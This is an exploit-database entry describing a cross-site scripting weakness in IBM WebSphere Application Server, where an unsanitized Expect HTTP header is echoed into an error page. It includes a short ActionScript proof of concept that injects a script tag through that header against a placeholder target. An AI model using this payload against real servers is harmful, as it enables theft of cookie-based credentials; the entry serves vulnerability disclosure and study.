header-logo
Suggest Exploit
vendor:
WebSphere Application Server
by:
7.5
CVSS
HIGH
HTTP Request Header Security Weakness
CWE
Product Name: WebSphere Application Server
Affected Version From:
Affected Version To:
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

IBM WebSphere Application Server HTTP Request Header Security Weakness

The software fails to sanitize a certain HTTP header when the data is redirected to an error message. An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26457/info

IBM WebSphere Application Server is prone to a security weakness regarding an HTTP request header. The software fails to sanitize a certain HTTP header when the data is redirected to an error message.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks. 

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");